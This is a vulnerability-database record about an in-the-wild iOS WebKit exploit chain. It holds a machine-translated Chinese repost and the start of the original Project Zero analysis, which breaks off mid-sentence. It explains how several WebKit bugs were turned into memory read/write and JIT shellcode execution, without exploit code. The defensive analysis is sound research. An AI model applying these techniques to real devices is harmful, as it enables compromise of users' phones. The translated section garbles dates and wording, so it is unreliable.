DATABASE RESOURCES PRICING ABOUT US

{"id": "MYHACK58:62201996030", "bulletinFamily": "info", "title": "In-depth exploration found in the wild iOS exploit chain VI-vulnerability warning-the black bar safety net", "description": "In this article, we will Analysis on your iOS device to get the normal permissions of the shell of the WebKit exploit method, where all the vulnerabilities are available on iOS's sandboxed renderer process WebContent implemented shellcode code execution. Although on iOS Chrome will also be affected by these browser vulnerabilities to attack, but the attacker would just use them to locate the Safari and the iPhone's location. \nThis article will first briefly describe each use of the WebKit vulnerabilities and an attacker how from build a memory read/write primitives, and then outlines for shellcode code execution techniques as well as how to bypass the existing JIT code injection mitigation measures. \nInterestingly, these vulnerabilities do not have a vulnerability to bypass on the A12 on the device are enabled based on PAC JIT strengthen mitigation measures. Exploits by vulnerability to support the latest iOS version, if the exploit is missing in the version check, it will be based on the repair date and prior to the vulnerability to guess the supported version range. \nThe sandboxed renderer process using the first get memory read/write functions, and then the shellcode injected into the JIT area to obtain the native code execution privileges. It seems every time you broke a new major can exploit the vulnerability, the new vulnerability will be added to the framework to use to do read/write check, and then inserted into the existing exploit frameworks. The exploits used are also common exploit techniques, for example, first create addrof and fakeobj primitive, then fake JS object to implement the read/write. \nFor many exploit programs, it is unclear whether they have in some 0day or 1day on successful use. Now also don't know the attacker is how to first get these vulnerability information. Typically, they are used to repair the finish after the release of the public exploit to use. WebKit in the fix version is sent to the user before publishing the vulnerability details. CVE-2019-8518 is in 2019 2 May 9, WebKit HEAD disclosed in repair, submitted for 4a23c92e6883 it. This commit contains a test case, the test cases triggered a vulnerability and lead to a JSArray of cross-border access, this situation is usually very easy to exploit. However, the fixes only in 2019 3 December 25 release iOS 12.2 user post, is in about the vulnerability details publicly after a month and a half before release. The technical ability of the user to be within a few days time to replace the underlying vulnerabilities, thereby obtaining the advantage of the latest capabilities of the device, without self-tap new holes. This may occur at least in some of the following vulnerabilities in. \nIn order to do the comparison, the following is a list of the other browser vendors is how to deal with this vulnerability window problems: \nGoogle and Chromium the same problem exists, for example, submitted 52a9e67a477b fix for CVE-2018-17463-in. However, it seems some of the recent vulnerabilities release no longer contains the JavaScript test cases. For example, our team members Sergey Glazunov reported the following two for the vulnerability fix: aa00ee22f8f7 for vulnerability 1784 and 4edcc8605461 for vulnerability 1793 in. \nMicrosoft will open source the Chakra engine in the security fixes that confidential treatment until the fix has been sent to the user before the public. Then released the repair after the procedure and publishes the CVE number. For this example, see commit 7f0d390ad77d it. However, it should be noted that the Chakra will soon be the Edge of the V8\uff08Chromium's JavaScript engine replaced. \nMozilla directly prohibits a public repository of security fixes, they will directly release the next version. In addition, it is not disclosed for triggering a vulnerability in the JavaScript test cases. \nHowever, it is worth noting that, even if the Don't get the JavaScript test case, you can still through a code patch written in the PoC and eventually exploit the vulnerability. \n\n0x01 exploit 1: iOS 10.0~10.3.2 \nThis exploits the target is CVE-2017-2505, initially by lokihardt report for Project Zero issue 1137, and in 2017 to 3 January 11, on the WebKit HEAD by submission 4a23c92e6883 repair. The fix is then in the 5 on 15, publishing to the iOS 10.3.2 the user. Interestingly, the exploit exp is almost the WebKit repository in the bug report and test file exactly the same. You can see in the image below, the left image is displayed in the WebKit code repository publish a test with the example on the right shows the triggering of vulnerabilities in the wild exploit code part. \n! [](/Article/UploadPic/2019-9/2019917134229760. png) \nThe vulnerability will lead to the use of controlled data writes to achieve the JSC heap bounds. Attacker destruction of controlled JSObject one of the first QWord, changing its structure ID to the run-time type information with JSCell associated with to make it appear as a Uint32Array with. Thus, they actually created a fake TypedArray, will directly allow them to construct a memory read/write primitives. \n\n0x02 exploit 2: iOS 10.3~10.3.3 \nThe exploit is for CVE-2017-7064 or its variant, which was originally by lokihardt found and reported as issue 1236 in. The vulnerability has been in 2017 4 November 18 in the WebKit HEAD by submission ad6d74945b13 repair, and in 2017, the 7 on 19, released to the iOS 10.3.3 of the user. The vulnerabilities could cause uninitialized memory to be treated as JS array of content, through reactor operation technology, you can control the uninitialized data, this time by the double-precision and JSValues between the type of confused structure addrof and fakeobj primitive, so that by construction forged TypedArray get memory read/write. \n\n0x03 exploit 3: iOS 11.0~11.3 \nThis exploit is a WebKit vulnerability 181867, the CVE number might be CVE-2018-4122\u3002 It in 2018 1 November 19 in the WebKit HEAD in repair, and in 2018 3 May 29, released to iOS 11.3 the user. The vulnerability is typical of the JIT side-effect problems. It is unclear how the attacker is in early 2018 will know of this vulnerability. The vulnerability through the confusion is not initialized double, and Whether the array built addrof and fakeobj primitive, and then again by forgery to obtain memory read/write a typed array of objects. \n\n0x04 exploits 4: iOS 11.3~11.4.1 \nThis exploit is for the 2018 \u5e74 5 \u6708 16 filed in the b4e567d371fd fix the vulnerability, and corresponding to the WebKit bug report 185694 it. Unfortunately, we are unable to determine the allocation to this issue of the CVE, but it seems that the patches in 2018 7 May 9, publishing to the iOS 11.4.1 the user. This is another JIT side-effect issues, similar to the previous vulnerability, again constructed fakeobj primitive to forge a JS object. However, it has now been released Gigacage mitigation measures. Therefore, construction of the pseudo-ArrayBuffers / TypedArrays are no longer useful. \nThe exploit constructs a fake unboxed double Array, and get an initial, limited memory read/write primitives. Then using the initial primitive to disable Gigacage mitigation measures, and then continue to use TypedArrays to perform behind the exploits. \n\n0x05 exploit 5: iOS 11.4.1 \nThe exploit is for CVE-2018-4438 vulnerability, the lokihardt report of 1649 it. This vulnerability is in 2018 10 May 26 using the commit 8deb8bd96f4a repair, and in 2018, 12 \u6708 5 issued to the iOS 12.1.1 the user. The wrong hole you can build a proxy the prototype of the array, and then, by the JIT-compiled code in the trigger change, this vulnerability is converted to the JIT side-effect problems. The vulnerability before the vulnerability is very similar, first using the limited JS array read/write disable Gigacage mitigation measures, and then by TypedArrays perform a full read/write the shellcode to be injected. \n\n\n**[1] [[2]](<96030_2.htm>) [next](<96030_2.htm>)**\n", "published": "2019-09-17T00:00:00", "modified": "2019-09-17T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "http://www.myhack58.com/Article/html/3/62/2019/96030.htm", "reporter": "\u4f5a\u540d", "references": [], "cvelist": ["CVE-2019-8518", "CVE-2017-7064", "CVE-2018-4438", "CVE-2017-2505", "CVE-2018-17463", "CVE-2018-4122"], "type": "myhack58", "lastseen": "2019-09-17T10:34:08", "edition": 2, "viewCount": 133, "enchantments": {"dependencies": {"references": [{"type": "apple", "idList": ["APPLE:0185CC37EE7038D3199A6E5B2057A61C", "APPLE:114C93F6E9562A87B113C0263CD1817D", "APPLE:21F236C1A9D411224D0D290A7D88873F", "APPLE:26A4DD401596A54883933FFA750F140A", "APPLE:34416127035F64778C9F3F0EB9CDBC11", "APPLE:444B5944D49C1B1DB2F8D833473A3E28", "APPLE:45AEF0978F404334493CA78A1CA75347", "APPLE:4D5091F8F1A9B18C444D1AD97567CE76", "APPLE:5C4BCF7A4E483742CFDCE8A4CB334C8E", "APPLE:5D035145E3EE53A8C36DC063A0DC8B49", "APPLE:66FADA9BFB47C90D568A156164B964D6", "APPLE:6B41E03BE95C41152A91DE7584480E16", "APPLE:6C518E60468B6DC0634A48452DB0FFBE", "APPLE:71C21790A57960E5B8D57DC4227D5449", "APPLE:7AFC35B4B1D8C25A050E4C951554FD97", "APPLE:8C49A1E8A033BC61B2EB11E42BABEFC6", "APPLE:9B31F90F381961095FA996D2A3A9579C", "APPLE:B4A175C182756FCB9C8C7BC8F7CC89F0", "APPLE:B9D8B8E6AD5C97CD8596F47682EA2AD9", "APPLE:CEC7DCE5379D5C1DBB2795CA582D13CD", "APPLE:CFC2451DF75048E4D98C6C690A558872", "APPLE:D6582852ADC12259E5A65509B1EDEA8C", "APPLE:DB93D66014439127A48A03A39A345E1E", "APPLE:E1B2FDC8AFC1E2B240E65D382EBD5FEA", "APPLE:F5ED4B2C8BF2CB139C4753A54898E258", "APPLE:HT207798", "APPLE:HT207801", "APPLE:HT207804", "APPLE:HT207921", "APPLE:HT207923", "APPLE:HT207927", "APPLE:HT207928", "APPLE:HT208693", "APPLE:HT208694", "APPLE:HT208695", "APPLE:HT208696", "APPLE:HT208697", "APPLE:HT208698", "APPLE:HT209340", "APPLE:HT209342", "APPLE:HT209343", "APPLE:HT209344", "APPLE:HT209345", "APPLE:HT209346", "APPLE:HT209599", "APPLE:HT209601", "APPLE:HT209602", "APPLE:HT209603", "APPLE:HT209604", "APPLE:HT209605"]}, {"type": "archlinux", "idList": ["ASA-201707-25", "ASA-201810-12"]}, {"type": "attackerkb", "idList": ["AKB:1FEA5875-DB2E-48AA-A4F4-0E24C3124828"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-1037", "CPAI-2017-1038", "CPAI-2018-1319", "CPAI-2018-1597", "CPAI-2019-2192"]}, {"type": "chrome", "idList": ["GCSA-1598641215032171443"]}, {"type": "cve", "idList": ["CVE-2017-2505", "CVE-2017-7064", "CVE-2018-17463", "CVE-2018-4122", "CVE-2018-4438", "CVE-2019-8518"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4330-1:7D0A8", "DEBIAN:DSA-4330-1:C6D67"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-2505", "DEBIANCVE:CVE-2017-7064", "DEBIANCVE:CVE-2018-17463", "DEBIANCVE:CVE-2018-4122", "DEBIANCVE:CVE-2018-4438", "DEBIANCVE:CVE-2019-8518"]}, {"type": "fedora", "idList": ["FEDORA:33FB9639A184", "FEDORA:417B06017118", "FEDORA:532F960CF00C", "FEDORA:D681D609273A", "FEDORA:DA59A6087D6C"]}, {"type": "freebsd", "idList": ["0F66B901-715C-11E7-AD1F-BCAEC565249C", "3DD46E05-9FB0-11E9-BF65-00012E582166"]}, {"type": "gentoo", "idList": ["GLSA-201706-15", "GLSA-201808-04", "GLSA-201811-10", "GLSA-201909-05"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:A46B3136EBE92DFE53548BB20EFF1ABC"]}, {"type": "kaspersky", "idList": ["KLA11075", "KLA11281", "KLA11338", "KLA11384", "KLA11455", "KLA11456"]}, {"type": "kitploit", "idList": ["KITPLOIT:8766743662298222785"]}, {"type": "mageia", "idList": ["MGASA-2017-0228", "MGASA-2018-0213"]}, {"type": "nessus", "idList": ["700116.PRM", "700117.PRM", "700118.PRM", "700166.PRM", "700167.PRM", "700168.PRM", "700503.PRM", "700507.PRM", "700548.PRM", "700555.PRM", "700558.PRM", "ALMA_LINUX_ALSA-2019-3553.NASL", "APPLETV_10_2_1.NASL", "APPLETV_11_3.NASL", "APPLETV_12_1_1.NASL", "APPLE_IOS_1032_CHECK.NBIN", "APPLE_IOS_1033_CHECK.NBIN", "APPLE_IOS_113_CHECK.NBIN", "APPLE_IOS_1211_CHECK.NBIN", "APPLE_IOS_122_CHECK.NBIN", "CENTOS8_RHSA-2019-3553.NASL", "DEBIAN_DSA-4330.NASL", "FEDORA_2017-24BDDB96B5.NASL", "FEDORA_2017-73D6A0DFBB.NASL", "FEDORA_2017-9D572CC64A.NASL", "FEDORA_2018-34F7F68029.NASL", "FEDORA_2018-FD194A1F14.NASL", "FREEBSD_PKG_0F66B901715C11E7AD1FBCAEC565249C.NASL", "FREEBSD_PKG_3DD46E059FB011E9BF6500012E582166.NASL", "GENTOO_GLSA-201706-15.NASL", "GENTOO_GLSA-201808-04.NASL", "GENTOO_GLSA-201811-10.NASL", "GENTOO_GLSA-201909-05.NASL", "GOOGLE_CHROME_70_0_3538_67.NASL", "ITUNES_12_6_2.NASL", "ITUNES_12_6_2_BANNER.NASL", "ITUNES_12_7_4.NASL", "ITUNES_12_7_4_BANNER.NASL", "ITUNES_12_9_2.NASL", "MACOSX_GOOGLE_CHROME_70_0_3538_67.NASL", "MACOSX_SAFARI10_1_1.NASL", "MACOSX_SAFARI10_1_2.NASL", "MACOSX_SAFARI11_1_0.NASL", "MACOSX_SAFARI12_0_2.NASL", "MACOS_ITUNES_12_6_2.NASL", "NEWSTART_CGSL_NS-SA-2021-0041_WEBKITGTK4.NASL", "NEWSTART_CGSL_NS-SA-2021-0166_WEBKITGTK4.NASL", "OPENSUSE-2017-1268.NASL", "OPENSUSE-2018-118.NASL", "OPENSUSE-2018-1208.NASL", "OPENSUSE-2018-1253.NASL", "OPENSUSE-2018-1288.NASL", "OPENSUSE-2019-108.NASL", "OPENSUSE-2019-1374.NASL", "OPENSUSE-2019-308.NASL", "OPENSUSE-2019-712.NASL", "OPENSUSE-2019-81.NASL", "REDHAT-RHSA-2018-3004.NASL", "SUSE_SU-2017-2933-1.NASL", "SUSE_SU-2018-0219-1.NASL", "SUSE_SU-2018-3387-1.NASL", "SUSE_SU-2019-0092-1.NASL", "SUSE_SU-2019-0146-1.NASL", "SUSE_SU-2019-0497-1.NASL", "SUSE_SU-2019-1137-1.NASL", "UBUNTU_USN-3376-1.NASL", "UBUNTU_USN-3635-1.NASL", "UBUNTU_USN-3948-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704330", "OPENVAS:1361412562310810988", "OPENVAS:1361412562310811251", "OPENVAS:1361412562310811252", "OPENVAS:1361412562310811535", "OPENVAS:1361412562310813109", "OPENVAS:1361412562310813110", "OPENVAS:1361412562310813111", "OPENVAS:1361412562310814094", "OPENVAS:1361412562310814095", "OPENVAS:1361412562310814096", "OPENVAS:1361412562310814601", "OPENVAS:1361412562310814602", "OPENVAS:1361412562310814603", "OPENVAS:1361412562310814875", "OPENVAS:1361412562310814876", "OPENVAS:1361412562310815005", "OPENVAS:1361412562310843266", "OPENVAS:1361412562310843514", "OPENVAS:1361412562310843977", "OPENVAS:1361412562310851645", "OPENVAS:1361412562310851693", "OPENVAS:1361412562310851948", "OPENVAS:1361412562310851995", "OPENVAS:1361412562310852089", "OPENVAS:1361412562310852248", "OPENVAS:1361412562310852266", "OPENVAS:1361412562310852338", "OPENVAS:1361412562310852488", "OPENVAS:1361412562310873180", "OPENVAS:1361412562310873200", "OPENVAS:1361412562310873226", "OPENVAS:1361412562310875299", "OPENVAS:1361412562310876138"]}, {"type": "osv", "idList": ["OSV:DSA-4330-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142664", "PACKETSTORM:143479", "PACKETSTORM:150746", "PACKETSTORM:156640"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D"]}, {"type": "redhat", "idList": ["RHSA-2018:3004", "RHSA-2019:3553", "RHSA-2020:4298"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-17463", "RH:CVE-2019-8518"]}, {"type": "seebug", "idList": ["SSV:93145", "SSV:96302"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:2991-1", "OPENSUSE-SU-2018:0326-1", "OPENSUSE-SU-2018:3273-1", "OPENSUSE-SU-2018:3396-1", "OPENSUSE-SU-2018:3473-1", "OPENSUSE-SU-2018:3835-1", "OPENSUSE-SU-2019:0081-1", "OPENSUSE-SU-2019:0108-1", "OPENSUSE-SU-2019:0308-1", "OPENSUSE-SU-2019:1374-1", "SUSE-SU-2017:2933-1", "SUSE-SU-2018:0219-1"]}, {"type": "threatpost", "idList": ["THREATPOST:2EA02E029D18D4A6E2F53BF8057CCD57", "THREATPOST:37BD8473EEF61891FD09D32105F6C9E1"]}, {"type": "ubuntu", "idList": ["USN-3376-1", "USN-3635-1", "USN-3948-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-2505", "UB:CVE-2017-7064", "UB:CVE-2018-17463", "UB:CVE-2018-4122", "UB:CVE-2018-4438", "UB:CVE-2019-8518"]}, {"type": "veracode", "idList": ["VERACODE:29237"]}, {"type": "zdi", "idList": ["ZDI-18-271"]}, {"type": "zdt", "idList": ["1337DAY-ID-28183", "1337DAY-ID-31778", "1337DAY-ID-32484", "1337DAY-ID-34054"]}]}, "score": {"value": -0.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "apple", "idList": ["APPLE:0185CC37EE7038D3199A6E5B2057A61C", "APPLE:114C93F6E9562A87B113C0263CD1817D", "APPLE:21F236C1A9D411224D0D290A7D88873F", "APPLE:26A4DD401596A54883933FFA750F140A", "APPLE:34416127035F64778C9F3F0EB9CDBC11", "APPLE:444B5944D49C1B1DB2F8D833473A3E28", "APPLE:45AEF0978F404334493CA78A1CA75347", "APPLE:4D5091F8F1A9B18C444D1AD97567CE76", "APPLE:5C4BCF7A4E483742CFDCE8A4CB334C8E", "APPLE:5D035145E3EE53A8C36DC063A0DC8B49", "APPLE:66FADA9BFB47C90D568A156164B964D6", "APPLE:6B41E03BE95C41152A91DE7584480E16", "APPLE:6C518E60468B6DC0634A48452DB0FFBE", "APPLE:71C21790A57960E5B8D57DC4227D5449", "APPLE:7AFC35B4B1D8C25A050E4C951554FD97", "APPLE:8C49A1E8A033BC61B2EB11E42BABEFC6", "APPLE:9B31F90F381961095FA996D2A3A9579C", "APPLE:B4A175C182756FCB9C8C7BC8F7CC89F0", "APPLE:B9D8B8E6AD5C97CD8596F47682EA2AD9", "APPLE:CEC7DCE5379D5C1DBB2795CA582D13CD", "APPLE:CFC2451DF75048E4D98C6C690A558872", "APPLE:D6582852ADC12259E5A65509B1EDEA8C", "APPLE:DB93D66014439127A48A03A39A345E1E", "APPLE:E1B2FDC8AFC1E2B240E65D382EBD5FEA", "APPLE:F5ED4B2C8BF2CB139C4753A54898E258", "APPLE:HT207798", "APPLE:HT207801", "APPLE:HT207804", "APPLE:HT207921", "APPLE:HT207923", "APPLE:HT207927", "APPLE:HT207928", "APPLE:HT208693", "APPLE:HT208694", "APPLE:HT208695", "APPLE:HT208696", "APPLE:HT208697", "APPLE:HT208698", "APPLE:HT209340", "APPLE:HT209342", "APPLE:HT209343", "APPLE:HT209344", "APPLE:HT209345", "APPLE:HT209346", "APPLE:HT209599", "APPLE:HT209601", "APPLE:HT209602", "APPLE:HT209603", "APPLE:HT209604", "APPLE:HT209605"]}, {"type": "archlinux", "idList": ["ASA-201707-25", "ASA-201810-12"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-1037", "CPAI-2017-1038", "CPAI-2018-1319", "CPAI-2018-1597", "CPAI-2019-2192"]}, {"type": "chrome", "idList": ["GCSA-1598641215032171443"]}, {"type": "cve", "idList": ["CVE-2017-2505", "CVE-2017-7064", "CVE-2018-4122"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4330-1:C6D67"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-17463"]}, {"type": "fedora", "idList": ["FEDORA:33FB9639A184", "FEDORA:417B06017118", "FEDORA:532F960CF00C", "FEDORA:D681D609273A", "FEDORA:DA59A6087D6C"]}, {"type": "freebsd", "idList": ["0F66B901-715C-11E7-AD1F-BCAEC565249C"]}, {"type": "gentoo", "idList": ["GLSA-201808-04"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:A46B3136EBE92DFE53548BB20EFF1ABC"]}, {"type": "kaspersky", "idList": ["KLA11075"]}, {"type": "kitploit", "idList": ["KITPLOIT:8766743662298222785"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/CHROME_OBJECT_CREATE"]}, {"type": "nessus", "idList": ["APPLETV_10_2_1.NASL", "DEBIAN_DSA-4330.NASL", "FEDORA_2017-24BDDB96B5.NASL", "FEDORA_2017-73D6A0DFBB.NASL", "FEDORA_2017-9D572CC64A.NASL", "FREEBSD_PKG_0F66B901715C11E7AD1FBCAEC565249C.NASL", "GENTOO_GLSA-201808-04.NASL", "GOOGLE_CHROME_70_0_3538_67.NASL", "ITUNES_12_6_2.NASL", "ITUNES_12_7_4.NASL", "MACOSX_GOOGLE_CHROME_70_0_3538_67.NASL", "MACOSX_SAFARI10_1_1.NASL", "MACOSX_SAFARI10_1_2.NASL", "MACOSX_SAFARI11_1_0.NASL", "OPENSUSE-2018-118.NASL", "SUSE_SU-2017-2933-1.NASL", "SUSE_SU-2018-0219-1.NASL", "UBUNTU_USN-3376-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704330", "OPENVAS:1361412562310810988", "OPENVAS:1361412562310811251", "OPENVAS:1361412562310811252", "OPENVAS:1361412562310811535", "OPENVAS:1361412562310813109", "OPENVAS:1361412562310813110", "OPENVAS:1361412562310813111", "OPENVAS:1361412562310851995", "OPENVAS:1361412562310852089", "OPENVAS:1361412562310873180", "OPENVAS:1361412562310873200"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142664", "PACKETSTORM:143479", "PACKETSTORM:156640"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D"]}, {"type": "redhat", "idList": ["RHSA-2018:3004"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-17463"]}, {"type": "seebug", "idList": ["SSV:93145", "SSV:96302"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:0326-1", "SUSE-SU-2017:2933-1", "SUSE-SU-2018:0219-1"]}, {"type": "threatpost", "idList": ["THREATPOST:2EA02E029D18D4A6E2F53BF8057CCD57"]}, {"type": "ubuntu", "idList": ["USN-3376-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-17463", "UB:CVE-2018-4122", "UB:CVE-2018-4438", "UB:CVE-2019-8518"]}, {"type": "zdi", "idList": ["ZDI-18-271"]}, {"type": "zdt", "idList": ["1337DAY-ID-28183", "1337DAY-ID-34054"]}]}, "exploitation": null, "vulnersScore": -0.6}, "immutableFields": [], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "scheme": null, "_state": {"dependencies": 1659988328, "score": 1659982289}, "_internal": {"score_hash": "3c9b8a1a508ee966380225cd6c88907e"}}

{"googleprojectzero": [{"lastseen": "2021-07-30T19:22:59", "description": "Posted by Samuel Gro\u00df, Project Zero\n\n** \n** \n\n\nIn this post, we will take a look at the WebKit exploits used to gain an initial foothold onto the iOS device and stage the privilege escalation exploits. All exploits here achieve shellcode execution inside the sandboxed renderer process (WebContent) on iOS. Although Chrome on iOS would have also been vulnerable to these initial browser exploits, they were only used by the attacker to target Safari and iPhones. \n \nAfter some general discussion, this post first provides a short walkthrough of each of the exploited WebKit bugs and how the attackers construct a memory read/write primitive from them, followed by an overview of the techniques used to gain shellcode execution and how they bypassed existing JIT code injection mitigations, namely the \u201cbulletproof JIT\u201d. \n \nIt is worth noting that none of the exploits bypassed the new, PAC-based JIT hardenings that are enabled on A12 devices. The exploit writeups are sorted by the most recent iOS version the exploit supports as indicated by a version check in the exploit code itself. If that version check was missing from the exploit, the supported version range was guessed based on the date of the fix and the previous exploits. \n \nThe renderer exploits follow common practice and first gain memory read/write capabilities, then inject shellcode into the JIT region to gain native code execution. In general it seems that every time a new bug was necessary/available, the new bug was exploited for read/write and then plugged into the existing exploit framework. The exploits for the different bugs also appear to generally use common exploit techniques, e.g. by first creating [the addrof and fakeobj primitives](<http://www.phrack.org/papers/attacking_javascript_engines.html>), then faking JS objects to achieve read/write. \n \nFor many of the exploits it is unclear whether they were originally exploited as 0day or as 1day after a fix had already shipped. It is also unknown how the attackers obtained knowledge of the vulnerabilities in the first place. Generally they could have discovered the vulnerabilities themselves or used public exploits released after a fix had shipped. Furthermore, at least for WebKit, it is often possible to extract details of a vulnerability from the public source code repository before the fix has been shipped to users. [CVE-2019-8518](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1775>) can be used to highlight this problem (as can many other recent vulnerabilities). The vulnerability was publicly fixed in WebKit HEAD on Feb 9 2019 with commit [4a23c92e6883](<https://github.com/WebKit/webkit/commit/4a23c92e6883b230a437bcc09f94422d7df8756c>). This commit contains a testcase that triggers the issue and causes an out-of-bounds access into a JSArray - a scenario that is usually easy to exploit. However, the fix only shipped to users with the release of iOS 12.2 on March 25 2019, roughly one and a half months after details about the vulnerability were public. An attacker in possession of a working exploit for an older WebKit vulnerability would likely only need a few days to replace the underlying vulnerability and thus gain the capability to exploit up-to-date devices without the need to find new vulnerabilities themselves. It is likely that this happened for at least some of the following exploits. \n \nFor comparison, here is how other browser vendors deal with this \u201cpatch-gap\u201d or vulnerability window problem:\n\n * Google has this same problem with Chromium (e.g. commit [52a9e67a477b](<https://chromium.googlesource.com/v8/v8.git/+/52a9e67a477bdb67ca893c25c145ef5191976220>) fixing [CVE-2018-17463](<http://www.phrack.org/papers/jit_exploitation.html>) and including a PoC trigger). However, it appears that some recent bugfixes no longer include the JavaScript test cases commits. For example the following two fixes for vulnerabilities reported by our team member Sergey Glazunov: [aa00ee22f8f7](<https://chromium.googlesource.com/v8/v8.git/+/aa00ee22f8f7722b505fc24acf7e544dfe59ce77>) (for issue [1784](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1784>)) and [4edcc8605461](<https://chromium.googlesource.com/v8/v8.git/+/4edcc860546157cb35940663afb9af568595888f>) (for issue [1793](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1793>)). In the latter case, only a C++ test was added that tested the new behaviour without indication of how the vulnerable code could be reached.\n\n * Microsoft keeps security fixes in the open source Chakra engine private until the fixes have been shipped to users. The security fixes are then released and marked as such with a CVE identifier. See commit [7f0d390ad77d](<https://github.com/microsoft/ChakraCore/commit/7f0d390ad77d838cbb81d4586c83ec822f384ce8>) for an example of this. However, it should be noted that Chakra will soon be replaced by V8 (Chromium\u2019s JavaScript engine) in Edge.\n\n * Mozilla appears to hold back security fixes from the public repository until somewhat close to the next release. Furthermore, the commits usually do not include the JavaScript testcases used to trigger the vulnerability.\n\n \nHowever, it is worth noting that even if no JavaScript testcase is attached to the commit, it is often still possible to reconstruct a trigger (and ultimately an exploit) for the vulnerability from the code changes and/or commit message with moderate effort. \n\n\n## Exploit 1: iOS 10.0 until 10.3.2\n\nThis exploit targets CVE-2017-2505 which was originally reported by lokihardt as Project Zero issue [1137](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1137>) and fixed in WebKit HEAD with commit [4a23c92e6883](<https://github.com/WebKit/webkit/commit/4a23c92e6883b230a437bcc09f94422d7df8756c>) on Mar 11th 2017. The fix was then shipped to users with the release of iOS 10.3.2 on May 15th 2017, over two months later. \n \nOf interest, the exploit trigger is almost exactly the same as in the bug report and the regression test file in the WebKit repository. This can be seen in the following two images, the left one showing the testcase published in the WebKit code repository as part of the bugfix and the right showing the part of the in-the-wild exploit code that triggered the bug.\n\n \n \n\n\n[](<https://1.bp.blogspot.com/-PEZlVLEefs0/XWg4BdDSxkI/AAAAAAAANUs/ELjHWgzHOZIRKSTV45E-moRivJKrAWIkACLcBGAs/s1600/JSC%2BDIFF.png>)\n\n \nThe bug causes an out-of-bounds write to the JSC heap with controlled data. The attackers exploit this by corrupting the first QWord of a controlled JSObject, changing its Structure ID (which associates runtime type information with a JSCell) to make it appear as a Uint32Array instead. This way, they essentially create a fake TypedArray which directly allows them to construct a memory read/write primitive.\n\n## Exploit 2: iOS 10.3 until 10.3.3\n\nThis exploit seems to target CVE-2017-7064 (or a variant thereof), which was originally discovered by lokihardt and reported as issue [1236](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1236>). The bug was fixed in WebKit HEAD with commit [ad6d74945b13](<https://github.com/WebKit/webkit/commit/ad6d74945b13a8ca682bffe5b4e9f1c6ce0ae692>) on Apr 18th 2017 and shipped to users with the release of iOS 10.3.3 on Jul 19th 2017, over three months later. \n \nThe bug causes uninitialized memory to be treated as the content of a JS Array. Through standard heap manipulation techniques it is possible to control the uninitialized data, at which point it becomes possible to construct the well-known addrof and fakeobj primitives through a type confusion between doubles and JSValues and thus gain memory read/write by constructing a fake TypedArray.\n\n## Exploit 3: likely iOS 11.0 until 11.3\n\nThis exploit targets the WebKit bug [181867](<https://bugs.webkit.org/show_bug.cgi?id=181867>) which might be CVE-2018-4122. It was fixed in WebKit HEAD on Jan 19, 2018 and presumably shipped to users with the release of iOS 11.3 on Mar 29th 2018. \n \nThe bug is a classic (by 2019 standards) [JIT side-effect modelling issue](<https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf>). It remains unclear whether the attackers knew about this bug class before it started to be widely known around the beginning of 2018. The exploit again constructs the addrof and fakeobj primitives by confusing unboxed double and JSValue arrays, then gains memory read/write by again faking a typed array object.\n\n## Exploit 4: likely iOS 11.3 until 11.4.1\n\nThis exploit targets the bug fixed in commit [b4e567d371fd](<https://github.com/WebKit/webkit/commit/b4e567d371fde84474a56810a03bf3d0719aed1e>) on May 16th 2018 and corresponding to WebKit issue [185694](<https://bugs.webkit.org/show_bug.cgi?id=185694>). Unfortunately, we were unable to determine the CVE assigned to this issue, but it seems likely that the fix shipped to users with the release of iOS 11.4.1 on Jul 9th 2018. \n \nThis is another JIT side-effect modelling bug with similar exploit to the previous one, again constructing the fakeobj primitive to fake JS object. However, by now the [Gigacage mitigation](<https://labs.mwrinfosecurity.com/blog/some-brief-notes-on-webkit-heap-hardening/>) had shipped. As such it was no longer useful to construct fake 